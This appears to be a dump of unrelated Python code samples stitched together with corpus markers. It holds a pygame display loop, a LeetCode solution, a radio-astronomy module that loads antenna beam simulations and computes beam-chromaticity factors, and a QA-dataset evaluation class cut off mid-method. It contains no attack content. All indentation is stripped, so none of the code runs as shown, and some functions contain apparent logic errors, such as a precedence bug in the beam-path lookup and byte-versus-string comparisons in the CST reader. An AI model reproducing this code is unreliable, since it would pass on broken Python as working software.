screen.blit(image5, (0,0))
screen.blit(image4, (300,300))
screen.blit(image3, (100,400))
screen.blit(image2, (200,200))
screen.blit(image1, (400,400))
screen.blit(image0, (0,0))
pygame.display.flip()
clock.tick(30)
pygame.quit() | StarcoderdataPython |
8146669 | <reponame>mehrab97/Leetcoding
class Solution:
def findNumbers(self, nums: List[int]) -> int:
if len(nums) == 0:
return 0
return sum([1 for x in nums if len(str(x))%2 ==0]) | StarcoderdataPython |
6557605 | """Beam models and chromaticity corrections."""
from __future__ import annotations
from pathlib import Path
import logging
import hashlib
from methodtools import lru_cache
import astropy.coordinates as apc
import astropy.time as apt
import h5py
import numpy as np
import scipy.interpolate as spi
from tqdm import tqdm
import attr
from . import coordinates as coords
from .loss import ground_loss
from . import sky_models
from edges_io.h5 import HDF5Object
from ..config import config
from .. import const
from edges_cal import (
FrequencyRange,
modelling as mdl,
)
from .data import BEAM_PATH
from . import types as tp
logger = logging.getLogger(__name__)
# Reference UTC observation time. At this time, the LST is 0.1666 (00:10 Hrs LST) at the
# EDGES location. NOTE: this is used by default, but can be changed by the user anywhere
# it is used.
REFERENCE_TIME = apt.Time("2014-01-01T09:39:42", location=const.edges_location)
@attr.s
class Beam:
beam = attr.ib()
frequency = attr.ib()
elevation = attr.ib()
azimuth = attr.ib()
simulator = attr.ib(default=None, converter=str)
instrument = attr.ib(default=None, converter=str)
raw_file = attr.ib(default=None, converter=str)
@classmethod
def from_hfss(
cls,
path: [str, Path],
frequency: float,
linear: bool = True,
theta_min: float = 0,
theta_max: float = 180,
theta_resolution: float = 1,
phi_min: float = 0,
phi_max: float = 359,
phi_resolution: float = 1,
) -> Beam:
"""
Create a Beam object from a HFSS file.
Parameters
----------
path
Path to the file. Use :meth:`resolve_file` to get the absolute path
from a a relative path (starting with ':').
linear
Whether the beam values are in linear units (or decibels)
theta_min, theta_max
Min/Max of the zenith angle (degrees)
theta_resolution
Resolution of the zenith angle.
phi_min, phi_max
Min/Max of the azimuth angles (degrees)
phi_resolution
The resolution of the azimuth angle.
Returns
-------
beam
The beam object.
"""
d = np.genfromtxt(path, skip_header=1, delimiter=",")
theta = np.arange(theta_min, theta_max + theta_resolution, theta_resolution)
phi = np.arange(phi_min, phi_max + phi_resolution, phi_resolution)
beam_map = np.zeros((len(theta), len(phi)))
for i in range(len(theta)):
mask = d[:, 1] == theta[i]
this_phi = d[mask, 0]
this_power = d[mask, 2]
this_phi[this_phi < 0] += 360
this_phi, unique_inds = np.unique(this_phi, axis=0, return_index=True)
this_power = this_power[unique_inds]
this_power = this_power[np.argsort(this_phi)]
if not linear:
this_power = 10 ** (this_power / 10)
this_power[np.isnan(this_power)] = 0
beam_map[i, :] = this_power
return Beam(
frequency=np.array([frequency]),
elevation=theta,
azimuth=phi,
beam=beam_map,
simulator="hfss",
raw_file=path,
)
@classmethod
def from_wipld(cls, path: tp.PathLike, az_antenna_axis: float = 0) -> Beam:
"""Read a WIPL-D beam."""
with open(path) as fn:
file_length = 0
number_of_frequencies = 0
flag_columns = False
frequencies_list = []
for line in fn:
file_length += 1
if line[2] == ">":
number_of_frequencies += 1
frequencies_list.append(float(line[19:32]))
elif not flag_columns:
line_splitted = line.split()
number_of_columns = len(line_splitted)
flag_columns = True
rows_per_frequency = (
file_length - number_of_frequencies
) / number_of_frequencies
output = np.zeros(
(
int(number_of_frequencies),
int(rows_per_frequency),
int(number_of_columns),
)
)
frequencies = np.array(frequencies_list)
with open(path) as fn:
i = -1
for line in fn:
if line[2] == ">":
i += 1
j = -1
else:
j += 1
line_splitted = line.split()
line_array = np.array(line_splitted, dtype=float)
output[i, j, :] = line_array
# Re-arrange data
phi_u = np.unique(output[0, :, 0])
theta_u = np.unique(output[0, :, 1])
beam = np.zeros((len(frequencies), len(theta_u), len(phi_u)))
for i in range(len(frequencies)):
out_2D = output[i, :, :]
phi = out_2D[:, 0]
theta = (
90 - out_2D[:, 1]
) # theta is zero at the zenith, and goes to 180 deg
gain = out_2D[:, 6]
theta_u = np.unique(theta)
it = np.argsort(theta_u)
theta_a = theta_u[it]
for j in range(len(theta_a)):
phi_j = phi[theta == theta_a[j]]
gain_j = gain[theta == theta_a[j]]
ip = np.argsort(phi_j)
gp = gain_j[ip]
beam[i, j, :] = gp
# Flip beam from theta to elevation
beam_maps = beam[:, ::-1, :]
# Change coordinates from theta/phi, to AZ/EL
el = np.arange(0, 91)
az = np.arange(0, 360)
# Shifting beam relative to true AZ (referenced at due North)
beam_maps_shifted = cls.shift_beam_maps(az_antenna_axis, beam_maps)
return Beam(
frequency=frequencies,
azimuth=az,
elevation=el,
beam=beam_maps_shifted,
simulator="wipl-d",
raw_file=path,
)
@classmethod
def from_ideal(cls, delta_f=2, f_low=40, f_high=200, delta_az=1, delta_el=1):
"""Create an ideal beam that is completely unity."""
freq = np.arange(f_low, f_high, delta_f)
az = np.arange(0, 360, delta_az)
el = np.arange(0, 90 + 0.1 * delta_el, delta_el)
return Beam(
frequency=freq,
azimuth=az,
elevation=el,
beam=np.ones((len(freq), len(el), len(az))),
simulator="ideal",
)
@classmethod
def from_feko(cls, path: [str, Path], az_antenna_axis: float = 0) -> Beam:
"""
Read a FEKO beam file.
Parameters
----------
filename
The path to the file.
az_antenna_axis
The azimuth of the primary antenna axis, in degrees.
Returns
-------
beam_maps
A ``(Nfreq, Nel, Naz)`` array giving values of the beam. Note that elevation
and azimuth are always in 1-degree increments.
freq
The frequencies at which the beam is defined.
"""
filename = Path(path)
data = np.genfromtxt(str(filename))
frequency = []
with open(filename) as fl:
for line in fl.readlines():
if line.startswith("#FREQUENCY"):
line = line.split(" ")
indx = line.index("MHz")
frequency.append(float(line[indx - 1]))
freq = FrequencyRange(np.array(frequency))
# Loading data and convert to linear representation
beam_maps = np.zeros((len(frequency), 91, 360))
for i in range(len(frequency)):
beam_maps[i] = (10 ** (data[(i * 360) : ((i + 1) * 360), 2::] / 10)).T
# Shifting beam relative to true AZ (referenced at due North)
# Due to angle of orientation of excited antenna panels relative to due North
beam_maps = cls.shift_beam_maps(az_antenna_axis, beam_maps)
return Beam(
frequency=freq.freq,
beam=beam_maps,
azimuth=np.arange(0, 360),
elevation=np.arange(0, 91),
simulator="feko",
raw_file=path,
)
@classmethod
def from_cst(
cls,
file_name_prefix: tp.PathLike,
f_low: int = 40,
f_high: int = 100,
freq_p: int = 61,
theta_p: float = 181,
phi_p: float = 361,
az_antenna_axis: float = 0,
) -> Beam:
"""
Read a CST beam file.
Parameters
----------
filename
The path to the file.
az_antenna_axis
The azimuth of the primary antenna axis, in degrees.
f_low, f_high
lower and higher frequency bounds
freq_p
Number of frequency points in the simulation file.
theta_p
Number of zenith angle points in the simulation file.
phi_p
Number of azimuth points in the simulation file.
Returns
-------
beam
The beam object.
"""
phi_t = np.zeros((freq_p, theta_p * phi_p))
frequency = np.linspace(f_low, f_high, freq_p)
beam_square = np.zeros((freq_p, theta_p, phi_p))
res = (f_high - f_low) / (freq_p - 1)
for i in range(freq_p):
n = int(i * res + f_low)
fc_file = open(
file_name_prefix + "farfield (f=" + str(n) + ") [1].txt", "rb"
) #
for x, line in enumerate(fc_file):
if x > 1:
check = 0
for o in range(len(line)):
if line[o] != "":
check = check + 1
if check == 3:
phi_t[i][x - 2] = float(line.split()[2])
fc_file.close()
for i in range(freq_p):
for x in range(phi_p):
beam_square[i, :, x] = phi_t[i, x * theta_p : (x + 1) * theta_p]
beam_square[i, :, 0 : int(phi_p / 2)] = beam_square[
i, :, int(phi_p / 2) : phi_p - 1
]
freq = FrequencyRange(np.array(frequency))
beam_square[:, 91:, :] = 0
beam_maps = np.flip(beam_square[:, :91, :360], axis=1)
# Shifting beam relative to true AZ (referenced at due North)
# Due to angle of orientation of excited antenna panels relative to due North
beam_maps = cls.shift_beam_maps(az_antenna_axis, beam_maps)
return Beam(
frequency=freq.freq,
beam=beam_maps,
azimuth=np.arange(0, 360),
elevation=np.arange(0, 91),
simulator="cst",
raw_file=file_name_prefix,
)
@classmethod
def from_feko_raw(
cls,
file_name_prefix: tp.PathLike,
ext: str = "txt",
f_low: int = 40,
f_high: int = 100,
freq_p: int = 61,
theta_p: float = 181,
phi_p: float = 361,
az_antenna_axis: float = 0,
) -> Beam:
"""
Read a FEKO beam file.
Parameters
----------
filename
The path to the file.
az_antenna_axis
The azimuth of the primary antenna axis, in degrees.
f_low, f_high
lower and higher frequency bounds
freq_p
Number of frequency points in the simulation file.
theta_p
Number of zenith angle points in the simulation file.
phi_p
Number of azimuth points in the simulation file.
Returns
-------
beam
The beam object.
"""
beam_square = np.zeros((freq_p, theta_p, phi_p))
frequency = np.linspace(f_low, f_high, freq_p)
f1 = open(str(file_name_prefix) + "_0-90." + ext)
f2 = open(str(file_name_prefix) + "_91-180." + ext)
f3 = open(str(file_name_prefix) + "_181-270." + ext)
f4 = open(str(file_name_prefix) + "_271-360." + ext)
z = (
theta_p * 91 + 10
) # ---> change this to no.of theta * no.of phi + No.of header lines
for index, line in enumerate(f1):
if index % z == 0:
co = 0
if index % z >= 10:
x = list(map(float, line.split()))
beam_square[int(index / z), co % theta_p, int(co / theta_p)] = 10 ** (
x[8] / 10
)
co += 1
z = theta_p * 90 + 10 #
for index, line in enumerate(f2):
if index % z == 0:
co = 0
if index % z >= 10:
x = list(map(float, line.split()))
beam_square[
int(index / z), co % theta_p, int(co / theta_p) + 91
] = 10 ** (x[8] / 10)
co += 1
for index, line in enumerate(f3):
if index % z == 0:
co = 0
if index % z >= 10:
x = list(map(float, line.split()))
beam_square[
int(index / z), co % theta_p, int(co / theta_p) + 181
] = 10 ** (x[8] / 10)
co += 1
for index, line in enumerate(f4):
if index % z == 0:
co = 0
if index % z >= 10:
x = list(map(float, line.split()))
beam_square[
int(index / z), co % theta_p, int(co / theta_p) + 271
] = 10 ** (x[8] / 10)
co += 1
freq = FrequencyRange(np.array(frequency))
beam_square[:, 90:, :] = 0
beam_maps = np.flip(beam_square[:, :91, :360], axis=1)
# Shifting beam relative to true AZ (referenced at due North)
# Due to angle of orientation of excited antenna panels relative to due North
beam_maps = cls.shift_beam_maps(az_antenna_axis, beam_maps)
return Beam(
frequency=freq.freq,
beam=beam_maps,
azimuth=np.arange(0, 360),
elevation=np.arange(0, 91),
simulator="feko",
raw_file=file_name_prefix,
)
@classmethod
def get_beam_path(cls, band: str, kind: str | None = None) -> Path:
"""Get a standard path to a beam file."""
pth = BEAM_PATH / band / "default.txt" if not kind else kind + ".txt"
if not pth.exists():
raise FileNotFoundError(f"No beam exists for band={band}.")
return pth
def at_freq(
self,
freq: np.ndarray,
model: mdl.Model = mdl.Polynomial(
n_terms=13, transform=mdl.ScaleTransform(scale=75.0)
),
) -> Beam:
"""
Interpolate the beam to a new set of frequencies.
Parameters
----------
freq
Frequencies to interpolate to.
Returns
-------
beam
The Beam object at the new frequencies.
"""
if len(self.frequency) < 3:
raise ValueError(
"Can't freq-interpolate beam that has fewer than three frequencies."
)
# Frequency interpolation
interp_beam = np.zeros((len(freq), len(self.elevation), len(self.azimuth)))
cached_model = model.at(x=self.frequency)
for i, bm in enumerate(self.beam.T):
for j, b in enumerate(bm):
model_fit = cached_model.fit(ydata=b)
interp_beam[:, j, i] = model_fit.evaluate(freq)
return Beam(
frequency=freq,
azimuth=self.azimuth,
elevation=self.elevation,
beam=interp_beam,
)
def smoothed(
self,
model: mdl.Model = mdl.Polynomial(n_terms=12),
) -> Beam:
"""
Smoothes the beam within its same set of frequencies.
----------
Returns
-------
beam
The Beam object smoothed over its same frequencies.
"""
if len(self.frequency) < 3:
raise ValueError(
"Can't freq-interpolate beam that has fewer than three frequencies."
)
# Frequency smoothing
smooth_beam = np.zeros_like(self.beam)
cached_model = model.at(x=self.frequency)
for i, bm in enumerate(self.beam.T):
for j, b in enumerate(bm):
model_fit = cached_model.fit(ydata=b)
smooth_beam[:, j, i] = model_fit.evaluate()
return Beam(
frequency=self.frequency,
azimuth=self.azimuth,
elevation=self.elevation,
beam=smooth_beam,
)
@staticmethod
def shift_beam_maps(az_antenna_axis: float, beam_maps: np.ndarray):
"""Rotate beam maps around an axis.
Parameters
----------
az_antenna_axis
The aximuth angle of the antenna axis.
beam_maps
Beam maps as a function of frequency, za and az.
Returns
-------
beam maps
Array of the same shape as the input, but rotated.
"""
if az_antenna_axis < 0:
index = -az_antenna_axis
bm1 = beam_maps[:, :, index::]
bm2 = beam_maps[:, :, 0:index]
return np.append(bm1, bm2, axis=2)
elif az_antenna_axis > 0:
index = az_antenna_axis
bm1 = beam_maps[:, :, 0:(-index)]
bm2 = beam_maps[:, :, (360 - index) : :]
return np.append(bm2, bm1, axis=2)
else:
return beam_maps
@classmethod
def resolve_file(
cls,
path: tp.PathLike,
band: str | None = None,
configuration: str = "default",
simulator: str = "feko",
) -> Path:
"""Resolve a file path to a standard location."""
if str(path) == ":":
if band is None:
raise ValueError("band must be given if path starts with a colon (:)")
# Get the default beam file.
return BEAM_PATH / band / f"{configuration}.txt"
elif str(path).startswith(":"):
if band is None:
raise ValueError("band must be given if path starts with a colon (:)")
# Use a beam file in the standard directory.
return (
Path(config["paths"]["beams"]).expanduser()
/ f"{band}/simulations/{simulator}/{str(path)[1:]}"
).absolute()
else:
return Path(path).absolute()
@classmethod
def from_file(
cls,
band: str | None,
simulator: str = "feko",
beam_file: tp.PathLike = ":",
configuration: str = "default",
rotation_from_north: float = 90,
) -> Beam:
"""Read a beam from file."""
beam_file = cls.resolve_file(beam_file, band, configuration, simulator)
if simulator == "feko":
rotation_from_north -= 90
out = cls.from_feko(beam_file, az_antenna_axis=rotation_from_north)
elif simulator == "wipl-d": # Beams from WIPL-D
out = cls.from_wipld(beam_file, rotation_from_north)
elif simulator == "hfss":
out = cls.from_hfss(beam_file)
else:
raise ValueError(f"Unknown value for simulator: '{simulator}'")
out.instrument = band
return out
@lru_cache(maxsize=1000)
def angular_interpolator(self, freq_indx: int):
"""Return a callable function that interpolates the beam.
The returned function has the signature ``interp(az, el)``, where ``az`` is
azimuth in degrees, and ``el`` is elevation in degrees. They may be arrays,
in which case they should be the same length.
"""
el = self.elevation * np.pi / 180 + np.pi / 2
beam = self.beam[freq_indx]
if el[-1] > 0.999 * np.pi:
el = el[:-1]
beam = beam[:-1]
spl = spi.RectSphereBivariateSpline(
el,
self.azimuth * np.pi / 180,
beam,
pole_values=(None, beam[-1]),
pole_exact=True,
)
return lambda az, el: spl(
el * np.pi / 180 + np.pi / 2, az * np.pi / 180, grid=False
)
def between_freqs(self, low=0, high=np.inf) -> Beam:
"""Return a new :class:`Beam` object restricted a given frequency range."""
mask = (self.frequency >= low) & (self.frequency <= high)
return attr.evolve(self, frequency=self.frequency[mask], beam=self.beam[mask])
def get_beam_solid_angle(self) -> float:
"""Calculate the integrated beam solid angle."""
# Theta vector valid for the FEKO beams. In the beam, dimension 1 increases
# from index 0 to 90 corresponding to elevation, which is 90-theta
theta = self.elevation[::-1]
sin_theta = np.sin(theta * (np.pi / 180))
sin_theta_2D = np.tile(sin_theta, (360, 1)).T
beam_integration = np.sum(self.beam * sin_theta_2D)
return (1 / (4 * np.pi)) * ((np.pi / 180) ** 2) * beam_integration
class BeamFactor(HDF5Object):
"""A non-interpolated beam factor."""
_structure = {
"frequency": lambda x: (x.ndim == 1 and x.dtype == float),
"lst": lambda x: (x.ndim == 1 and x.dtype == float),
"antenna_temp_above_horizon": lambda x: (x.ndim == 2 and x.dtype == float),
"loss_fraction": lambda x: (x.ndim == 2 and x.dtype == float),
"beam_factor": lambda x: (x.ndim == 2 and x.dtype == float),
"meta": {
"beam_file": lambda x: isinstance(x, str),
"simulator": lambda x: isinstance(x, str),
"f_low": lambda x: isinstance(x, float),
"f_high": lambda x: isinstance(x, float),
"normalize_beam": lambda x: isinstance(x, (bool, np.bool_)),
"sky_model": lambda x: isinstance(x, str),
"rotation_from_north": lambda x: isinstance(x, float),
"index_model": lambda x: isinstance(x, str),
"reference_frequency": lambda x: isinstance(x, float),
"max_nside": lambda x: isinstance(x, (int, np.int64)),
},
}
@property
def beam_factor(self):
"""The beam chromaticity factor. Array is ``(n_lsts, n_freq)``."""
return self.load("beam_factor")
@property
def frequency(self):
"""The frequencies at which the beam factor is defined."""
return self.load("frequency")
@property
def lsts(self):
"""The LSTs at which the beam factor is defined."""
return self.load("lst")
def sky_convolution_generator(
lsts: np.ndarray,
ground_loss_file: str,
beam: Beam,
sky_model: sky_models.SkyModel,
index_model: sky_models.IndexModel,
normalize_beam: bool,
beam_smoothing: bool,
smoothing_model: mdl.Model,
location: apc.EarthLocation = const.edges_location,
ref_time: apt.Time = REFERENCE_TIME,
):
"""
Iterate through given LSTs and generate a beam*sky product at each freq and LST.
This is a generator, so it will yield a single item at a time (to save on memory).
Parameters
----------
lsts
The LSTs at which to evaluate the convolution.
ground_loss_file
A path to a file containing ground loss information.
beam
The beam to convolve.
sky_model
The sky model to convolve
index_model
The spectral index model of the sky model.
normalize_beam
Whether to ensure the beam is properly normalised.
beam_interpolation
Whether to smooth over freq axis
Yields
------
i
The LST enumerator
j
The frequency enumerator
mean_conv_temp
The mean temperature after multiplying by the beam (above the horizon)
conv_temp
An array containing the temperature after multiuplying by the beam in each pixel
above the horizon.
sky
An array containing the sky temperature in pixel above the horizon.
beam
An array containing the interpolatedbeam in pixels above the horizon
time
The local time at each LST.
n_pixels
The total number of pixels that are not masked.
Examples
--------
Use this function as follows:
>>> for i, j, mean_t, conv_t, sky, bm, time, npix in sky_convolution_generator():
>>> print(conv_t)
"""
if beam_smoothing:
beam = beam.smoothed(smoothing_model)
sky_map = sky_model.at_freq(
beam.frequency,
index_model=index_model,
)
ground_gain = ground_loss(
ground_loss_file, band=beam.instrument, freq=beam.frequency
)
galactic_coords = sky_model.get_sky_coords()
# Get the local times corresponding to the given LSTs
times = coords.lsts_to_times(lsts, ref_time, location)
for i, time in tqdm(enumerate(times), unit="LST"):
# Transform Galactic coordinates of Sky Model to Local coordinates
altaz = galactic_coords.transform_to(
apc.AltAz(
location=const.edges_location,
obstime=time,
)
)
az = np.asarray(altaz.az.deg)
el = np.asarray(altaz.alt.deg)
# Number of pixels over 4pi that are not 'nan'
n_pix_tot = len(el)
# Selecting coordinates above the horizon
horizon_mask = el >= 0
az_above_horizon = az[horizon_mask]
el_above_horizon = el[horizon_mask]
# Selecting sky data above the horizon
sky_above_horizon = np.ones_like(sky_map) * np.nan
sky_above_horizon[horizon_mask, :] = sky_map[horizon_mask, :]
# Loop over frequency
for j in tqdm(range(len(beam.frequency)), unit="Frequency"):
beam_above_horizon = np.ones(len(sky_map)) * np.nan
beam_above_horizon[horizon_mask] = beam.angular_interpolator(j)(
az_above_horizon, el_above_horizon
)
n_pix_ok = np.sum(~np.isnan(beam_above_horizon))
# The nans are only above the horizon
n_pix_tot_no_nan = n_pix_tot - (len(el_above_horizon) - n_pix_ok)
if normalize_beam:
solid_angle = np.nansum(beam_above_horizon) / n_pix_tot_no_nan
beam_above_horizon *= ground_gain[j] / solid_angle
antenna_temperature_above_horizon = (
beam_above_horizon * sky_above_horizon[:, j]
)
yield (
i,
j,
np.nansum(antenna_temperature_above_horizon) / n_pix_tot_no_nan,
antenna_temperature_above_horizon,
sky_above_horizon,
beam_above_horizon,
time,
n_pix_tot_no_nan,
)
def simulate_spectra(
beam: Beam,
ground_loss_file: [str, Path] = ":",
f_low: [None, float] = 0,
f_high: [None, float] = np.inf,
normalize_beam: bool = True,
sky_model: sky_models.SkyModel = sky_models.Haslam408(),
index_model: sky_models.IndexModel = sky_models.ConstantIndex(),
lsts: np.ndarray = None,
beam_smoothing: bool = True,
smoothing_model: mdl.Model = mdl.Polynomial(n_terms=12),
) -> tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Simulate global spectra from sky and beam models.
Parameters
----------
band
The band of the antenna (low, mid, high).
beam
A :class:`Beam` object.
ground_loss_file
A file pointing to a ground-loss model. By default, gets the default ground loss
model for the given ``band``.
f_low
Minimum frequency to keep in the simulation (frequencies otherwise defined by
the beam).
f_high
Maximum frequency to keep in the simulation (frequencies otherwise defined by
the beam).
normalize_beam
Whether to normalize the beam to be maximum unity.
sky_model
A sky model to use.
index_model
An :class:`IndexModel` to use to generate different frequencies of the sky
model.
lsts
The LSTs at which to simulate
Returns
-------
antenna_temperature_above_horizon
The antenna temperature for pixels above the horizon, shape (Nlst, Nfreq)
freq
The frequencies at which the simulation is defined.
lst
The LSTs at which the sim is defined.
"""
beam = beam.between_freqs(f_low, f_high)
if lsts is None:
lsts = np.arange(0, 24, 0.5)
antenna_temperature_above_horizon = np.zeros((len(lsts), len(beam.frequency)))
for i, j, temperature, _, _, _, _, _ in sky_convolution_generator(
lsts,
ground_loss_file,
beam,
sky_model,
index_model,
normalize_beam,
beam_smoothing,
smoothing_model,
):
antenna_temperature_above_horizon[i, j] = temperature
return antenna_temperature_above_horizon, beam.frequency, lsts
def antenna_beam_factor(
beam: Beam,
ground_loss_file: [str, Path] = ":",
f_low: float = 0,
f_high: float = np.inf,
normalize_beam: bool = True,
sky_model: sky_models.SkyModel = sky_models.Haslam408(),
index_model: sky_models.IndexModel = sky_models.GaussianIndex(),
lsts: [None, np.ndarray] = None,
save_dir: [None, str, Path] = None,
save_fname: [None, str, Path, bool] = None,
reference_frequency: [None, float] = None,
beam_smoothing: bool = True,
smoothing_model: mdl.Model = mdl.Polynomial(n_terms=12),
):
"""
Calculate the antenna beam factor.
Parameters
----------
beam
A :class:`Beam` object.
ground_loss_file
A file pointing to a ground-loss model. By default, gets the default ground loss
model for the given ``band``.
f_low
Minimum frequency to keep in the simulation (frequencies otherwise defined by
the beam).
f_high
Maximum frequency to keep in the simulation (frequencies otherwise defined by
the beam).
normalize_beam
Whether to normalize the beam to be maximum unity.
sky_model
A sky model to use.
index_model
An :class:`IndexModel` to use to generate different frequencies of the sky
model.
twenty_min_per_lst
How many periods of twenty minutes fit into each LST bin.
save_dir
The directory in which to save the output beam factor.
save_fname
The filename to save the output beam factor.
reference_frequency
The frequency to take as the "reference", i.e. where the chromaticity will
be by construction unity.
Returns
-------
beam_factor : :class`BeamFactor` instance
"""
if not save_dir:
save_dir = Path(config["paths"]["beams"]) / f"{beam.instrument}/beam_factors/"
else:
save_dir = Path(save_dir)
if str(save_fname).startswith(":"):
save_fname = Path(save_dir).absolute() / str(save_fname)[1:]
beam = beam.between_freqs(f_low, f_high)
if lsts is None:
lsts = np.arange(0, 24, 0.5)
# Get index of reference frequency
if reference_frequency is None:
reference_frequency = (f_high + f_low) / 2
indx_ref_freq = np.argwhere(beam.frequency >= reference_frequency)[0][0]
reference_frequency = beam.frequency[indx_ref_freq]
antenna_temperature_above_horizon = np.zeros((len(lsts), len(beam.frequency)))
convolution_ref = np.zeros((len(lsts), len(beam.frequency)))
loss_fraction = np.zeros((len(lsts), len(beam.frequency)))
for i, j, temperature, _, sky, bm, _, npix_no_nan in sky_convolution_generator(
lsts,
beam=beam,
sky_model=sky_model,
index_model=index_model,
normalize_beam=normalize_beam,
beam_smoothing=beam_smoothing,
smoothing_model=smoothing_model,
ground_loss_file=ground_loss_file,
):
antenna_temperature_above_horizon[i, j] = temperature
# Convolution between (beam at all frequencies) and (sky at reference frequency)
convolution_ref[i, j] = np.nansum(bm * sky[:, indx_ref_freq])
# Loss fraction
loss_fraction[i, j] = 1 - np.nansum(bm) / npix_no_nan
# Beam factor
beam_factor = (convolution_ref.T / convolution_ref[:, indx_ref_freq]).T
out = {
"frequency": beam.frequency.astype(float),
"lst": np.array(lsts).astype(float),
"antenna_temp_above_horizon": antenna_temperature_above_horizon,
"loss_fraction": loss_fraction,
"beam_factor": beam_factor,
"meta": {
"beam_file": str(beam.raw_file),
"simulator": beam.simulator,
"f_low": float(f_low),
"f_high": float(f_high),
"normalize_beam": bool(normalize_beam),
"sky_model": str(sky_model),
"index_model": str(index_model),
"reference_frequency": float(reference_frequency),
"rotation_from_north": float(90),
"max_nside": int(sky_model.max_res or 0),
},
}
if save_fname is None:
hsh = hashlib.md5(repr(out["meta"]).encode()).hexdigest()
save_fname = save_dir / (
f"{beam.simulator}_{sky_model.__class__.__name__}_"
f"ref{reference_frequency:.2f}_{hsh}.h5"
)
logger.info(f"Writing out beam file to {save_fname}")
bf = BeamFactor.from_data(out, filename=save_fname)
bf.write(clobber=True)
return bf
class InterpolatedBeamFactor(HDF5Object):
_structure = {
"beam_factor": None,
"frequency": None,
"lst": None,
}
@classmethod
def from_beam_factor(
cls,
beam_factor_file,
band: str | None = None,
lst_new: np.ndarray | None = None,
f_new: np.ndarray | None = None,
):
"""
Interpolate beam factor to a new set of LSTs and frequencies.
The LST interpolation is done using `griddata`, whilst the frequency
interpolation is done using a polynomial fit.
Parameters
----------
beam_factor_file : path
Path to a file containing beam factors produced by
:func:`antenna_beam_factor`.
If just a filename (no path), the `beams/band/beam_factors/` directory will
be searched (dependent on the configured "beams" directory).
band : str, optional
If `beam_factor_file` is relative, the band is required to find the file.
lst_new : array-like, optional
The LSTs to interpolate to. By default, keep same LSTs as input.
f_new : array-like, optional
The frequencies to interpolate to. By default, keep same frequencies as
input.
"""
beam_factor_file = Path(beam_factor_file).expanduser()
if str(beam_factor_file).startswith(":"):
beam_factor_file = (
Path(config["paths"]["beams"])
/ band
/ "beam_factors"
/ str(beam_factor_file)[1:]
)
if not beam_factor_file.exists():
raise ValueError(f"The beam factor file {beam_factor_file} does not exist!")
with h5py.File(beam_factor_file, "r") as fl:
beam_factor = fl["beam_factor"][...]
freq = fl["frequency"][...]
lst = fl["lst"][...]
# Wrap beam factor and LST for 24-hr interpolation
beam_factor = np.vstack((beam_factor[-1], beam_factor, beam_factor[0]))
lst0 = np.append(lst[-1] - 24, lst)
lst = np.append(lst0, lst[0] + 24)
if lst_new is not None:
beam_factor_lst = np.zeros((len(lst_new), len(freq)))
for i, bf in enumerate(beam_factor.T):
beam_factor_lst[:, i] = spi.interp1d(lst, bf, kind="cubic")(lst_new)
lst = lst_new
else:
beam_factor_lst = beam_factor
if f_new is not None:
# Interpolating beam factor to high frequency resolution
beam_factor_freq = np.zeros((len(beam_factor_lst), len(f_new)))
for i, bf in enumerate(beam_factor_lst):
beam_factor_freq[i] = spi.interp1d(freq, bf, kind="cubic")(f_new)
freq = f_new
else:
beam_factor_freq = beam_factor_lst
return cls.from_data(
{"beam_factor": beam_factor_freq, "frequency": freq, "lst": lst}
)
def evaluate(self, lst):
"""Fast nearest-neighbour evaluation of the beam factor for a given LST."""
beam_factor = np.zeros((len(lst), len(self["frequency"])))
for i, lst_ in enumerate(lst):
index = np.argmin(np.abs(self["lst"] - lst_))
beam_factor[i] = self["beam_factor"][index]
return beam_factor
| StarcoderdataPython |
3275075 | <filename>MetaQA/QA_Dataset/QA_Dataset.py
from __future__ import annotations
import json
import random
from datasets import load_dataset, load_metric
import json
import re
import string
from collections import Counter
from rouge_score import rouge_scorer
import pandas as pd
import os
class QA_Dataset():
def __init__(self, dataset_name) -> None:
self.list_qids = []
self.dataset_name = dataset_name
self._dict_qid2question = dict()
self._dict_qid2list_answer_labels = dict()
self._dict_qid2list_options = dict()
self._dict_qid2ans_idx = dict()
def get_question(self, qid) -> str:
if qid in self._dict_qid2question:
return self._dict_qid2question[qid]
else:
raise ValueError("qid not found in dataset")
def get_list_answer_label(self, qid) -> list(str):
if qid in self._dict_qid2list_answer_labels:
return self._dict_qid2list_answer_labels[qid]
else:
raise ValueError("qid not found in dataset")
def get_list_options(self, qid) -> list(str):
if qid in self._dict_qid2list_options:
return self._dict_qid2list_options[qid]
else:
raise ValueError("qid not found in dataset")
def evaluate(self, dict_qid2prediction) -> dict:
'''
Input: dict_qid2prediction: dict of qid to prediction (str)
Output: {'metric': value}
'''
raise NotImplementedError("Please Implement this method")
def __getitem__(self, item):
return {'qid': self.list_qids[item], 'question': self.get_question(self.list_qids[item]),
'answer_label': self.get_list_answer_label(self.list_qids[item])}
def __len__(self):
return len(self.list_qids)
def __repr__(self) -> str:
# prints name and length of dataset
return f"{self.dataset_name} with {len(self)} questions"
def normalize_answer(self, s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r"\b(a|an|the)\b", " ", text)
def white_space_fix(text):
return " ".join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return "".join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def f1_score(self, prediction, ground_truth):
prediction_tokens = self.normalize_answer(prediction).split()
ground_truth_tokens = self.normalize_answer(ground_truth).split()
common = Counter(prediction_tokens) & Counter(ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
class Extractive_QA_Dataset(QA_Dataset):
def __init__(self, dataset_path, dataset_name, subsample_size=None) -> None:
super().__init__(dataset_name)
with open(dataset_path, 'r') as f:
data = json.load(f)
if subsample_size is not None:
data['data'] = random.sample(data['data'], subsample_size)
for x in data['data']:
self.list_qids.append(x['id'])
self._dict_qid2question[x['id']] = x['question']
self._dict_qid2list_answer_labels[x['id']] = x['answers']['text']
def evaluate(self, dict_qid2prediction) -> dict:
'''
Input: dict_qid2prediction: dict of qid (str) to prediction (str)
Output: {'exact_match': value, 'f1': value}
'''
# 1) load the metric
metric = load_metric('squad')
# 2) get the list of labels in the format of the squad metric
references = []
for qid in self.list_qids:
ref = {'id': qid , 'answers': {'text': [], 'answer_start': []}}
for ans in self.get_list_answer_label(qid):
ref['answers']['text'].append(ans)
ref['answers']['answer_start'].append(0)
references.append(ref)
# 3) get the predictions in the format of the squad metric
predictions = [{'id': qid, 'prediction_text': pred} for qid, pred in dict_qid2prediction.items()]
